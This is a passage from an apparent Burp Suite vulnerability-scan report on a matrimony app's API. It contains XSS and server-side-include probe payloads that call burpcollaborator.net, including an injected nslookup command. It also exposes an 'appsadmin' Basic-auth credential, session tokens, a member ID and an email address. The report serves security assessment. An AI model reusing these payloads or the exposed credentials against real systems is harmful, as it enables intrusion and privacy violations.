</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/getDeviceInfo.php/javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/[*/[]/
+((new(Image)).src=([]+/\/0kld6kqse4jv233xft35spevamge72ztnnaey3\.burpcollaborator.net/).replace(/\\/g,[]))//'> was not found
on this server.</p>
...[SNIP]...
5.21. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/loginwithdet.php8t3f64t875 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNT
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:25:39 GMT
Connection: close
5.22. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /applogin/loginwithdet.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f6z6jlq5ytay1h9i3uzib7vt1psvkn8fy3sqje8%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:09:27 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL
/applogin/loginwithdet.php/'"><svg/onload=(new(Image)).src='//6z6jlq5ytay1h9i3uzib7vt1psvkn8fy3sqje8\56burpcollabo
rator.net'> was not found on this server.</p>
...[SNIP]...
5.23. https://apps.bharatmatrimony.com/applogin/logout.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/logout.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/i54fkzlfj5 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 159
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:08:48 GMT
Connection: close
5.24. https://apps.bharatmatrimony.com/applogin/logout.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/logout.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /applogin/logout.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f9kum6tq1edj42c36f23esye4avgx4pudo0go5%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 159
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:13:02 GMT
Connection: close
5.25. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appmemberhome/memstats.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appmemberhome/ylu1gn7umd HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 170
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 222
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:00:45 GMT
Connection: close
5.26. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appmemberhome/memstats.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appmemberhome/memstats.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fob31x8hg5sajtrul6hutjd5j1a7ev6lufh75w%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 170
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:04:20 GMT
Connection: close
5.27. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephoto.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appphoto/enlargephoto.phpf68bdjilf8 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 255
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=%26APPVERSION%3D4.6&APPVERSIONCODE=%26APPVERSIONCODE
%3D192&ENCID=82518c062044e155fce5b3980c0e28c60&ENTRYTYPE=M&ID=M6651646&LOGINGEN=M&OUTPUTTYPE=2&SDBMAT
RID=M6651646&TOKENID=131
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:58:44 GMT
Connection: close
5.28. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephoto.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appphoto/enlargephoto.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fzorcajuri3nu627wjs74woiuelkq8iy6stkh9%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 255
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=%26APPVERSION%3D4.6&APPVERSIONCODE=%26APPVERSIONCODE
%3D192&ENCID=82518c062044e155fce5b3980c0e28c60&ENTRYTYPE=M&ID=M6651646&LOGINGEN=M&OUTPUTTYPE=2&SDBMAT
RID=M6651646&TOKENID=131
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 335
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:04:11 GMT
Connection: close
5.29. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephotodisplay.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appphoto/enlargephotodisplay.php3idgo4qx24 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 195
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=82518c062044e155fce5b3980c0e28c60&ID=M6651646&OUTPUT
TYPE=2&PHOTOPWD=PHOTOPWD&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&VIEWEDID=M6651646
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:51:30 GMT
Connection: close
5.30. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephotodisplay.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appphoto/enlargephotodisplay.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f6krj6qqyeaj12933fz3bsve1asgj67yxmr9jx8%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 195
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=82518c062044e155fce5b3980c0e28c60&ID=M6651646&OUTPUT
TYPE=2&PHOTOPWD=PHOTOPWD&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&VIEWEDID=M6651646
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 343
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:05:07 GMT
Connection: close
5.31. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appcurltrack.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appsearch/%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%22z9y%22%20value%3d%22y8xbuieq22%22--%3e%3c!--
%23set%20var%3d%221b0%22%20value%3d%220azdwkgs44%22--%3e%3c!--%23echo%20var%3d%22z9y%22--%3e%3c!--%23echo
%20var%3d%221b0%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname
%20lvkyh51dppugdoeiqeeq3apgl7ryimakybqygm5.burpcollaborator.net%22%20--%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 51
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=&regdata=
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 556
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:34:38 GMT
Connection: close
5.32. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appcurltrack.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appsearch/appcurltrack.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2ftsp6edylmxroawbqnmby0imoifo6fu7lvfi76w
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 51
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=&regdata=
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:41:47 GMT
Connection: close
5.33. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
GET /appsearch/appwhoviewedprofile.phpmn53oagde5?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fce5b3980c0e28c60&TOK
ENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&STLIMIT=0&RECCNT=20 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:13:49 GMT
Connection: close
5.34. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appsearch/appwhoviewedprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fvwv8if2nqzvqeyfsrof04kqqmhs9rxjn7hu8ix%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 344
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:11:58 GMT
Connection: close
5.35. https://apps.bharatmatrimony.com/appsuccess/successstory.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsuccess/successstory.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appsuccess/d0ktzpdvxq HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 215
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CASTE=1017&DOS=23&ENCID=cec3bc261ddb6cd658084cb7d672bf3f6&I
D=M6651646&LOGINENTRY=F&OUTPUTTYPE=2&RECORDCOUNT=20&STLIMIT=0&TOKENID=131c6f8396a2071562a9b7c10
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 219
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:09:25 GMT
Connection: close
5.36. https://apps.bharatmatrimony.com/appsuccess/successstory.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsuccess/successstory.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appsuccess/successstory.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fsa65wcgk4w9nsvtp5ltxih4n0e650tsjgd35ru%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 215
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CASTE=1017&DOS=23&ENCID=cec3bc261ddb6cd658084cb7d672bf3f6&I
D=M6651646&LOGINENTRY=F&OUTPUTTYPE=2&RECORDCOUNT=20&STLIMIT=0&TOKENID=131c6f8396a2071562a9b7c10
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:10:51 GMT
Connection: close
5.37. https://apps.bharatmatrimony.com/appunified/appinboxui.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/appinboxui.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appunified/appinboxui.phpenkvry4ekx HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 255
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=118&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FILTERTYPE=1&ID=M665
1646&LISTTYPE=1&NOOFREC=20&OUTPUTTYPE=2&PROFILEHIGHLIGHTS=2&READTYPE=23~24&START=0&TABTYPE=16&
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:35:46 GMT
Connection: close
5.38. https://apps.bharatmatrimony.com/appunified/appinboxui.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/appinboxui.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appunified/appinboxui.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fxdeazhjp71csv0wu8qw2lm7s3j9baz2pqjda1z%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:12:58 GMT
Connection: close
5.39. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [URL path filename]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/viewcalldetails.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appunified/viewcalldetails.phpyj5dbps38m HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 199
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID=M6651646&LOGINGE
N=M&NOOFREC=20&OUTPUTTYPE=2&REQTYPE=1&START=0&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:16:35 GMT
Connection: close
5.40. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [name of an arbitrarily supplied URL parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/viewcalldetails.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appunified/viewcalldetails.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b
%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c
%2fknbx94tchomf5n6hid6pv9hfd6jylmdd17oycn%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 420
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:13:44 GMT
Connection: close
· /applogin/loginwithdet.php
· /appmemberhome/memstats.php
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email
addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary
third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source)
may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the
application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or
excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox
addresses (such as helpdesk@example.com).
To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead
providing a form that generates the email server-side, protected by a CAPTCHA if necessary.
Vulnerability classifications
· CWE-200: Information Exposure
6.1. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The following email address was disclosed in the response:
· bmtesting34@gmail.com
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNT
...[SNIP]...
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6278
Content-Type: application/json
Date: Tue, 19 May 2020 12:24:06 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 17:54:04","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
0"},"GENDER":"M","PROFILECREATEDFOR":"1","MOTHERTONGUE":"47","GOTHRAID":"0","CASTE":"1017","POWERPACKSTATUS":"2",
"MEMBERTYPE":"F","SENTACCESS":"N","MEMBERSHIPNAME":"","MEMBERSTATUS":"0","MEMBEREMAIL":"bmtesting34@gmail.com
","DAYSOFREGISTRATION":"232","VALIDDAYS":"0","EXPIRYDATE":"2020-05-08
12:22:59","NUMBEROFPAYMENTS":"2","AUTORENEWALSTATUS":"0","POSTFLAG":"0","PROFILECOMPVAL":"79","ENABLEDISCOVER":
"1","DSSIMAGE":"","D
...[SNIP]...
6.2. https://apps.bharatmatrimony.com/appmemberhome/memstats.php
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appmemberhome/memstats.php
Issue detail
The following email address was disclosed in the response:
· bmtesting34@gmail.com
Request
POST /appmemberhome/memstats.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 170
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 3276
Content-Type: application/json
Date: Tue, 19 May 2020 15:43:14 GMT
Connection: close
Vary: Accept-Encoding
